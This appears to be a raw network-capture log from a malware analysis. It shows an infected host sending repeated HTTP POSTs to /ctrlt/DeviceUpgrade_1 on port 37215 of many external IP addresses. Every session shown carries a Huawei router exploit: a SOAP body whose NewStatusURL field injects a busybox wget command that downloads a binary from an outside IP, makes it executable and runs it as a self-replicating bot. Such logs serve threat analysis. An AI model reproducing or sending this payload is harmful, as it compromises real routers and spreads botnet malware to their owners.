62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  565192.168.2.134684441.22.0.7637215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:58:56.124886036 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  566192.168.2.13481844.87.167.9037215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:58:56.125004053 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  567192.168.2.1358952197.47.221.2437215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:58:56.125314951 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  568192.168.2.1334116157.66.106.10237215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:58:56.125386953 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  569192.168.2.1342958197.202.221.20037215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:58:56.125426054 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  570192.168.2.133666240.29.179.17137215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:58:56.125446081 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  571192.168.2.135534241.219.200.24237215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:58:56.125458956 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  572192.168.2.1337664157.43.203.23037215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:58:56.125474930 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  573192.168.2.1356134197.242.192.11437215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:58:56.125484943 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  574192.168.2.135350612.253.150.11237215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:58:56.125502110 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  575192.168.2.1355308197.163.112.1537215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:58:56.125504971 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
